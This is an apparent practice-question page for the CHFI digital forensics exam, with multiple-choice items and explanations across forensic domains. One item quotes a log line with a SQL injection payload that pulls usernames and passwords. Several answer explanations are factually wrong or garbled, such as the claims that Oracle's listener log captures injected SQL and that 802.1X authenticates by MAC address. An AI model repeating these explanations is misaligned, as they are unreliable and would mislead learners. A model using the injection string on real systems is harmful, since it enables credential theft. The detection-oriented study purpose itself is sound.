mediumFull explanation →

You are a forensic investigator responding to a security incident at a medium-sized company. The incident involved an attacker gaining unauthorized access to a Windows Server 2019 system. The server was taken offline by the IT team immediately after detection. Your task is to acquire forensic evidence from the server's hard drive. The server has a single 500 GB NTFS partition. You have a forensic workstation with a write blocker, a SATA-to-USB adapter, and a forensic imaging tool that supports both dd and EWF (E01) formats. The server is still physically in the server room, and the IT team has powered it off. You need to create a forensic image that preserves the integrity of the evidence and allows for efficient analysis. Which of the following is the most appropriate course of action?

A

Boot the server using a forensic live CD, connect an external USB drive to the server, and use 'dd' to create a raw image on the external drive.

B

Use the server's built-in backup utility to create a system state backup and copy it to a network share.

C

Remove the hard drive, connect it via a write blocker to the forensic workstation, and then use 'dd' over a network connection to send the image to a remote server.

D

Remove the hard drive, connect it via a write blocker to the forensic workstation, and create an EWF (E01) image stored locally on the forensic workstation's internal drive.

This method uses a write blocker to preserve integrity, and EWF format provides compression and metadata for efficient analysis.

Why: Option D is correct because it follows best practices for forensic acquisition: removing the hard drive and connecting it via a write blocker ensures that no data is altered during imaging. Using EWF (E01) format provides compression, metadata, and integrity checks (e.g., CRC32, MD5, SHA-1), which are essential for efficient analysis and evidence preservation. Storing the image locally on the forensic workstation avoids network latency and potential data corruption.
Q6
mediumFull explanation →

During a forensic investigation of a Windows 10 system, you need to analyze the file system to recover deleted files. Which TWO file system artifacts would be most useful for this purpose?

A

$LogFile

The $LogFile records metadata changes, including deletions; can help reconstruct file history.

B

$Boot file

C

$MFT (Master File Table)

The MFT contains file records; even after deletion, the record may remain until overwritten.

D

$Volume

E

$Bitmap

Why: $LogFile (A) records metadata changes to the NTFS volume, including transactions that can be replayed to recover file names and directory entries for recently deleted files. $MFT (C) contains the master file table entries for every file and directory; even after deletion, the MFT entry often remains until overwritten, allowing recovery of file attributes and data runs.

Want more OS and File System Forensics practice?

Practice this domain
9

Domain 9: Application, Email and Cloud Forensics

All Application, Email and Cloud Forensics questions
Q1
easyFull explanation →

A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?

A

Cross-site scripting (XSS)

B

Path traversal

C

Remote file inclusion

D

SQL injection

The UNION SELECT clause indicates an attempt to extract data from the database.

Why: The log entry shows a UNION SELECT statement appended to the id parameter, which is a classic SQL injection attempt.
Q2
mediumFull explanation →

During an investigation, an analyst extracts email headers from a suspicious email. The header includes: Received: from mail.attacker.com (192.168.1.100); DKIM-Signature: v=1; a=rsa-sha256; d=legitbank.com; s=selector1; bh=...; The email claims to be from support@legitbank.com. Which indicator strongly suggests email spoofing?

A

The email was sent on a weekend

B

The DKIM signature uses RSA-SHA256 algorithm

C

The X-Originating-IP header is present

D

The Received header shows the email came from a server not owned by legitbank.com

Legitimate emails from legitbank.com would originate from their own mail servers, not attacker.com.

Why: The DKIM-Signature domain (d=legitbank.com) should match the sender domain. However, the Received header shows the email originated from mail.attacker.com, not legitbank.com's mail servers. Additionally, analyzing the DKIM signature might fail if it doesn't match, but the mismatch in origin is a clear spoofing indicator.
Q3
hardFull explanation →

A forensic analyst is examining a Docker container suspected of being used for malicious activities. The container was running an Alpine Linux image and was stopped 2 hours ago. Which of the following is the BEST first step to collect volatile evidence?

A

Collect the container's log files from /var/log/

B

Create a memory dump of the container's process

C

Export the container's filesystem using docker export

docker export creates a tar archive of the container's filesystem, preserving persistent data.

D

Run docker attach to reconnect to the container

Why: When a container is stopped, its process state and other in-memory data are lost. The best first step is to create a forensic image of the container's filesystem layers, which are still available on the host. Docker containers' filesystems are stored as layers on the host, accessible via docker export or by copying the container's filesystem from /var/lib/docker/overlay2/.
Q4
mediumFull explanation →

A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?

A

AWS CloudTrail

CloudTrail is the audit log for API activity in AWS.

B

VPC Flow Logs

C

Amazon S3 access logs

D

AWS Config

Why: AWS CloudTrail records all API calls made to the AWS environment, including S3 bucket deletions. It logs the identity, source IP, and request parameters.
Q5
easyFull explanation →

Which tool is specifically designed to analyze email headers and track the path an email took across mail servers?

A

Wireshark

B

Volatility

C

EmailTracker

EmailTracker is purpose-built for email header forensics.

D

FTK Imager

Why: EmailTracker is a tool that parses email headers and visualizes the route, timing, and geolocation of mail servers.
Q6
mediumFull explanation →

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

A

Server-side request forgery (SSRF)

B

SQL injection

C

Webshell

A webshell allows remote command execution via a script file placed on the server.

D

Cross-site request forgery (CSRF)

Why: A file that accepts and executes commands remotely is a webshell, often placed via file upload vulnerabilities to maintain access.

Want more Application, Email and Cloud Forensics practice?

Practice this domain
10

Domain 10: Mobile and Malware Forensics

All Mobile and Malware Forensics questions
Q1
easyFull explanation →

During a mobile forensics investigation, an analyst needs to acquire data from an iPhone that cannot be bypassed via passcode. The device is locked, and the analyst has the passcode. Which acquisition method provides the MOST comprehensive data extraction?

A

Physical acquisition

Physical acquisition creates a full image of the device's storage, retrieving all data including deleted files.

B

Manual acquisition

C

Logical acquisition

D

File system acquisition

Why: Physical acquisition is the most comprehensive method because it creates a bit-for-bit copy of the entire flash storage, including the operating system, kernel, unallocated space, and deleted file remnants. Even with the passcode known, a locked iPhone restricts file system access via USB, but physical acquisition (often using advanced techniques like JTAG or chip-off) bypasses these restrictions to extract the raw NAND data, yielding the fullest forensic picture.
Q2
mediumFull explanation →

A security analyst is reviewing output from a Cuckoo Sandbox analysis of a suspicious executable. The report shows that the process created a mutex named 'Global\GLOBAL_MUTEX_123' and modified the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\. Which behavioral indicator is MOST evident?

A

Command and control communication

B

Persistence mechanism

The 'Run' key is a common persistence location to launch malware at startup.

C

Anti-debugging technique

D

Privilege escalation

Why: The modification of the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run is a classic persistence mechanism. This key is automatically processed by Windows Explorer at user logon, causing any executable listed there to run. Combined with the mutex creation (which prevents multiple instances), the behavioral indicator is clearly an attempt to establish persistence on the host.
Q3
hardFull explanation →

In an Android forensic investigation, an examiner extracts the /data/data/com.whatsapp/databases/msgstore.db file. The database contains a table 'messages' with columns 'key_remote_jid', 'data', and 'timestamp'. Which SQL query would retrieve all messages sent to a specific contact with a phone number ending in '1234'?

A

SELECT * FROM messages WHERE key_remote_jid = '%1234%'

B

SELECT * FROM messages WHERE key_remote_jid LIKE '%1234%'

'key_remote_jid' contains the recipient's JID; LIKE '%1234%' matches any JID ending in 1234.

C

SELECT * FROM messages WHERE data LIKE '%1234%'

D

SELECT * FROM messages WHERE timestamp LIKE '%1234%'

Why: Option B is correct because the `key_remote_jid` column stores the remote party's identifier (e.g., a phone number with country code), and the `LIKE '%1234%'` pattern matches any value containing '1234' anywhere in the string. This retrieves all messages where the contact's phone number ends with '1234', as required by the question.
Q4
easyFull explanation →

A forensic analyst is examining a Windows malware sample using static analysis. Which tool is BEST suited for viewing the PE header structure, including sections, imports, and exports?

A

Strings

B

Ghidra

C

IDA Pro

D

PEiD

PEiD is a tool for analyzing PE files, detecting packers, and viewing header information.

Why: PEiD is specifically designed to analyze PE (Portable Executable) headers, making it ideal for quickly viewing section tables, import/export tables, and detecting packers or compilers. It parses the IMAGE_NT_HEADERS structure directly, providing a concise summary of the PE layout without requiring disassembly or decompilation.
Q5
mediumFull explanation →

During an iOS forensic examination, an analyst extracts an iTunes backup and finds the file '3d0d7e5fb2ce288813306e4d4636395e047a3d28'. Which type of data does this file typically contain?

A

Call history

B

SMS and iMessage conversations

C

Keychain data

D

Notes app data

The hash corresponds to the Notes app's SQLite database (NotesStore.sqlite).

Why: The file '3d0d7e5fb2ce288813306e4d4636395e047a3d28' is the SQLite database (NotesStore.sqlite) that stores Apple's Notes app data in an iOS backup. Its SHA-1 hash name corresponds to the domain 'AppDomain-com.apple.mobilenotes' and contains the notes, attachments, and metadata. This is a well-known artifact in iOS forensics for recovering user-created notes.
Q6
mediumFull explanation →

A forensic examiner is analyzing an Android device that has been factory reset. Which artefact is MOST likely to persist after a factory reset, providing potential evidence of prior usage?

A

Google account artefacts

Google account credentials may be stored in the Google backup and could be restored after reset, or remnants may exist in the cloud.

B

App installation logs

C

Deleted SMS messages

D

Wi-Fi passwords

Why: Google account artefacts, such as the Google Services Framework (GSF) ID and the device's Google Account (GAIA) ID, are stored in the /data/system/ partition and are often retained even after a factory reset because the reset does not always wipe the cryptographic keys or the persistent data blocks used by Google's sync services. This allows forensic tools to recover the previously synced account details, providing evidence of prior usage.

Want more Mobile and Malware Forensics practice?

Practice this domain
11

Domain 11: Network and Cloud Forensics

All Network and Cloud Forensics questions
Q1
easyFull explanation →

An investigator needs to capture network traffic from a live network segment without altering the traffic flow. Which technique should they use?

A

Enable NetFlow on the router and capture flows

B

Configure a SPAN port on the switch

Port mirroring (SPAN) copies traffic to a monitor port without interrupting the original flow.

C

Deploy an ARP spoofing tool to redirect traffic

D

Set the NIC to promiscuous mode on the forensic workstation

Why: A SPAN (Switched Port Analyzer) port, also known as a mirror port, copies all traffic from a specified source port or VLAN to a destination port where the forensic workstation is connected. This allows the investigator to capture traffic without injecting any frames or altering the forwarding behavior of the switch, thus preserving the integrity of the live network segment.
Q2
mediumFull explanation →

During a cloud forensics investigation, the investigator discovers that the cloud provider uses shared storage for multiple tenants. Which challenge is MOST likely to arise when acquiring a forensic image?

A

Physical acquisition of the storage device is required

B

No API access to the storage system

C

Inability to decrypt data at rest

D

Data commingling with other tenants

Shared storage can result in data from multiple tenants occupying the same physical media, complicating isolation.

Why: In cloud environments with shared storage, data from multiple tenants resides on the same physical or logical volume. When acquiring a forensic image, the investigator cannot isolate a single tenant's data without also capturing other tenants' data, leading to data commingling. This violates chain-of-custody and privacy principles, making it the primary challenge.
Q3
hardFull explanation →

A forensic analyst is investigating a network breach and finds that the attacker used a technique that bypasses Network Access Control (NAC). Which of the following methods is commonly used to evade 802.1X authentication?

A

MAC address spoofing

Spoofing the MAC of an authorized device can allow the attacker to authenticate via 802.1X.

B

VLAN hopping using double tagging

C

DNS tunneling to exfiltrate data

D

ARP poisoning to redirect traffic

Why: MAC address spoofing is commonly used to bypass 802.1X authentication because 802.1X typically authenticates devices based on their MAC address after the EAP (Extensible Authentication Protocol) handshake. By spoofing the MAC address of an already-authenticated device, the attacker can impersonate that device and gain network access without valid credentials, effectively bypassing the NAC enforcement.
Q4
easyFull explanation →

A security team needs to preserve network evidence for a potential legal case. What is the BEST practice for capturing volatile network data?

A

Wait until normal business hours to capture traffic

B

Only record summary logs from the firewall

C

Perform packet capture using a portable tool and store the capture with a cryptographic hash

This ensures minimal impact and integrity of the captured data.

D

Use a dedicated forensic workstation with a write blocker

Why: Option C is correct because capturing volatile network data requires immediate acquisition of live traffic before it is lost, and using a portable tool (e.g., tcpdump, Wireshark) allows rapid deployment. Storing the capture with a cryptographic hash (e.g., SHA-256) ensures data integrity and chain of custody, which is essential for admissibility in legal proceedings. This approach preserves the most volatile evidence (packet contents) while providing verifiable proof that the data has not been altered.
Q5
mediumFull explanation →

In a cloud forensic investigation, the analyst needs to obtain a memory dump of a virtual machine. Which method is considered forensically sound?

A

Log into the VM and use a tool to create a crash dump

B

Copy the virtual disk file (.vmdk) and extract memory from it

C

Use a live forensic tool inside the VM to capture memory

D

Take a snapshot of the VM via the hypervisor and export the .vmem file

This method captures the VM's memory in a forensically sound manner.

Why: Option D is forensically sound because taking a snapshot of the VM via the hypervisor and exporting the .vmem file captures the entire volatile memory state from outside the guest OS, without altering any data inside the VM. This method preserves the memory in its pristine state and avoids the contamination that occurs when executing tools inside the suspect VM.
Q6
hardFull explanation →

An organization uses a cloud-based SIEM to collect logs from multiple sources. The investigator notices gaps in the log data for a critical system during the incident timeframe. What is the MOST likely cause?

A

Network latency delayed log delivery

B

Log rotation policy deleted logs prematurely

C

Time drift between the system and the SIEM

Clock skew can cause logs to appear missing or out of order.

D

The system's log level was set to ERROR only

Why: Time drift between the system and the SIEM causes logs to be timestamped incorrectly, leading to apparent gaps when the SIEM queries by time range. Even if logs are delivered, they may fall outside the incident timeframe in the SIEM's index, creating the illusion of missing data. This is a common issue in cloud-based SIEMs where NTP synchronization is not enforced across all sources.

Want more Network and Cloud Forensics practice?

Practice this domain
12

Domain 12: Database and Application Forensics

All Database and Application Forensics questions
Q1
mediumFull explanation →

During a database forensic investigation, an analyst discovers that multiple rows in a MySQL table have been deleted. The binary logs are enabled. Which approach should the analyst use to recover the deleted data?

A

Restore the transaction log files from backup and mount them to recover the deleted rows.

B

Use the 'SHOW UNDO' command to retrieve the deleted rows from undo tablespace.

C

Query the information_schema database to retrieve deleted rows from the data dictionary.

D

Parse the binary logs using mysqlbinlog to extract the DELETE statements and reconstruct the lost data.

Binary logs record all data changes; mysqlbinlog can output the SQL statements, including deletes.

Why: MySQL binary logs record all changes to the database, including DELETE statements. The mysqlbinlog utility can parse these logs to reconstruct the exact DELETE operations, allowing the analyst to reverse-engineer the deleted rows by extracting the row data from the log events. This is the standard forensic method for recovering deleted data when binary logging is enabled.
Q2
easyFull explanation →

A forensic analyst is investigating a compromised web application that uses an Oracle database. The analyst suspects that SQL injection was used to extract sensitive data. Which Oracle log source would provide evidence of the injected SQL statements?

A

Control file

B

Redo log files

C

Listener log (listener.log)

With audit enabled, the listener log can capture SQL statements.

D

Alert log (alert_SID.log)

Why: The listener.log is the correct source because Oracle's listener records all client connections and SQL*Net traffic, including the raw SQL statements sent to the database. When SQL injection is performed, the injected payload is transmitted as part of the SQL query over the network, and the listener log captures these exact statements, providing direct evidence of the attack.
Q3
hardFull explanation →

An organization uses Microsoft SQL Server 2019 with full recovery model. A database administrator accidentally executed a DROP TABLE statement. The transaction log was backed up immediately after the incident. Which forensic technique would allow the analyst to restore the dropped table?

A

Restore the transaction log backup taken after the DROP TABLE and apply it to the database.

B

Use the RESTORE LOG statement with the NO_TRUNCATE option to recover the table.

C

Perform a tail-log backup, then restore the full backup and all subsequent transaction log backups, stopping before the DROP TABLE.

Point-in-time restore allows recovery to just before the drop.

D

Restore the most recent full backup and ignore subsequent transaction log backups.

Why: Option C is correct because, under the full recovery model, point-in-time recovery is required to undo the DROP TABLE. By performing a tail-log backup (to capture any transactions after the last log backup), then restoring the full backup and all subsequent transaction log backups with STOPAT or STOPBEFOREMARK to the moment just before the DROP TABLE, the analyst can recover the table without losing other transactions. This is the only method that preserves the dropped table's data while maintaining database consistency.
Q4
mediumFull explanation →

During a forensic investigation of a MongoDB database, the analyst needs to identify which user executed a particular write operation. Which MongoDB log or feature should the analyst examine?

A

Journal (journal directory)

B

System log (mongod.log)

C

Audit log (auditLog)

Audit log records user actions when enabled.

D

Oplog (local.oplog.rs)

Why: The audit log (auditLog) is the correct source because it is specifically designed to record user authentication and database operations, including which user executed a write operation. MongoDB's audit system captures detailed events such as insert, update, and delete commands along with the authenticated user identity, making it the definitive forensic artifact for user attribution.
Q5
hardFull explanation →

A forensic analyst is examining a PostgreSQL database server that was compromised. The attacker gained superuser access and deleted several rows from a critical table. The database is configured with WAL (Write-Ahead Log) archiving. Which method would allow the analyst to identify the exact time the deletions occurred?

A

Review the pg_stat_activity view to see the history of queries executed.

B

Examine the archive_status directory to find the timestamp of the WAL file that contains the deletion.

C

Query the pg_audit table to retrieve a log of all DELETE statements.

D

Use the pg_waldump utility to parse the WAL files and identify DELETE operations with timestamps.

pg_waldump can decode WAL records, showing the exact operations and timestamps.

Why: D is correct because `pg_waldump` is the PostgreSQL utility specifically designed to parse Write-Ahead Log (WAL) files and display their contents in a human-readable format, including the exact timestamps and operation types (e.g., DELETE). Since the database uses WAL archiving, the archived WAL segments will contain a record of every data modification, allowing the analyst to pinpoint when the deletions occurred.
Q6
easyFull explanation →

Which TWO of the following are valid methods for collecting volatile data from a live database server during an incident response?

A

Extract the file system journal

B

Take a backup of the database using mysqldump

C

Create a forensic image of the hard disk

D

Execute netstat -an to list active network connections

Netstat shows current connections, which are volatile.

E

Capture a memory dump using a tool like LiME or FTK Imager

Memory dump captures volatile data.

Why: Option D is correct because `netstat -an` lists all active network connections and listening ports without performing DNS resolution, which is critical for identifying unauthorized connections or ongoing data exfiltration from the live database server. This command retrieves data from the kernel's network stack, which is volatile and would be lost if the system were powered down.

Want more Database and Application Forensics practice?

Practice this domain
13

Domain 13: Malware Forensics

All Malware Forensics questions
Q1
mediumFull explanation →

During a malware investigation, an analyst discovers a suspicious file with a hash value that matches known malware. However, the file fails to execute and does not exhibit any malicious behavior in a sandbox. What is the most likely reason for this discrepancy?

A

The file is a false positive and is actually benign

B

The sandbox is not updated with the latest signatures

C

The file's metadata has been modified to evade analysis

D

The file is packed or obfuscated to prevent execution in a sandbox

Packing can prevent execution until unpacked, causing the sandbox to not observe malicious behavior.

Why: Option D is correct because malware authors often use packing or obfuscation techniques to prevent the malicious payload from executing in an analysis environment. The packed code requires a specific unpacking routine or trigger (e.g., a specific system call, registry key, or timing condition) that the sandbox does not provide, causing the file to appear inert. This is a common anti-sandbox technique distinct from simple signature evasion.
Q2
hardFull explanation →

An organization suspects a stealthy malware infection on a critical server. Traditional antivirus and EDR solutions have not detected anything. Which forensic approach would be most effective in identifying the malware, given that it likely resides only in memory?

A

Perform a full disk scan with updated antivirus signatures

B

Acquire a memory dump and perform memory forensics with tools like Volatility

Memory forensics captures the malware's code and artifacts in RAM for analysis.

C

Conduct a live analysis using built-in Windows tools like Task Manager

D

Analyze network traffic for anomalies using a NetFlow analyzer

Why: Option B is correct because the malware resides only in memory, making it invisible to disk-based scans. Memory forensics with tools like Volatility allows investigators to analyze RAM artifacts (e.g., processes, network connections, injected code) to detect stealthy malware that never writes to disk.
Q3
easyFull explanation →

A security analyst is tasked with reverse engineering a suspected malware sample. Which initial step should the analyst take to ensure safe handling and prevent accidental infection?

A

Create a bit-for-bit forensic image of the sample

A forensic copy preserves evidence and allows safe analysis.

B

Execute the sample in a debugger on a production machine

C

Disassemble the binary using IDA Pro directly

D

Connect the sample to an isolated network to observe behavior

Why: Creating a bit-for-bit forensic image (option A) is the correct first step because it preserves the malware in an immutable, write-protected state, preventing any accidental execution or modification. This ensures the integrity of the evidence and allows the analyst to work with a safe copy without risking infection of the host system or network. In malware forensics, this aligns with the fundamental principle of maintaining a chain of custody and avoiding alteration of the original sample.
Q4
mediumFull explanation →

During malware analysis, an investigator finds that a suspicious process is injecting code into a legitimate system process (e.g., explorer.exe). Which technique is being used?

A

API hooking

B

Process hollowing

C

Code injection

Code injection is the technique of inserting code into a running process.

D

DLL injection

Why: Code injection is the correct answer because the scenario describes a process injecting arbitrary code into a legitimate system process like explorer.exe. This is the generic term for techniques where malicious code is written into the address space of another process and executed, often via Windows API calls such as WriteProcessMemory and CreateRemoteThread. The question explicitly states 'injecting code,' which directly maps to the broad category of code injection, not a specific subtype.
Q5
hardFull explanation →

Which TWO of the following are common indicators of a rootkit infection on a Windows system?

A

High CPU usage by svchost.exe

B

System calls returning inconsistent results

Rootkits hook system calls to return false information.

C

Unexpected open ports on the firewall

D

Presence of unsigned kernel drivers

E

Hidden processes not visible in Task Manager

Rootkits hide processes from standard system tools.

Why: Option B is correct because rootkits operate at the kernel level, intercepting system calls to hide their presence. When a system call (e.g., NtQuerySystemInformation) is invoked, the rootkit modifies the return data to exclude malicious processes or files, causing the results to be inconsistent with the actual system state. This is a classic symptom of a kernel-mode rootkit that has hooked the System Service Dispatch Table (SSDT).
Q6
mediumFull explanation →

Which THREE of the following are best practices for conducting malware forensics in a safe and effective manner?

A

Use a dedicated forensic workstation that is not connected to any network

Prevents malware from spreading and ensures analysis integrity.

B

Delete the malware sample after analysis to prevent accidental infection

C

Always create a cryptographic hash of the malware sample before analysis

Hashing verifies integrity and aids in identifying known samples.

D

Use a virtual machine or sandbox for dynamic analysis

Isolates the malware to prevent damage to the host system.

E

Run all analysis using the same tools and versions as the attacker

Why: Option A is correct because a dedicated forensic workstation that is not connected to any network prevents the malware from communicating with command-and-control (C2) servers, exfiltrating data, or spreading to other systems. This isolation ensures the integrity of the analysis environment and protects the broader infrastructure from accidental infection or data leakage.

Want more Malware Forensics practice?

Practice this domain

Frequently asked questions

How many questions are on the CHFI exam?

The CHFI exam has 125 questions and must be completed in 240 minutes. The passing score is 700/1000.

What types of questions appear on the CHFI exam?

Scenario-based questions covering exam objectives with detailed answer explanations.

How are CHFI questions organised by domain?

The exam covers 13 domains: Computer Forensics Investigation Process, Computer Forensics Fundamentals and Process, Storage Forensics and File System Analysis, Incident Response and First Responder Skills, Computer Forensics Lab, Evidence Acquisition and Duplication, OS and Network Forensics, OS and File System Forensics, Application, Email and Cloud Forensics, Mobile and Malware Forensics, Network and Cloud Forensics, Database and Application Forensics, Malware Forensics. Questions are weighted by domain — higher-weight domains appear more on your actual exam.

Are these the actual CHFI exam questions?

No. These are original exam-style practice questions written against the official EC-Council CHFI exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.

Ready to practice all 125 CHFI questions?

Courseiva tracks your accuracy per domain and routes you toward weak areas automatically. Free, no account required.

Browse all CHFI questionsTake a timed practice test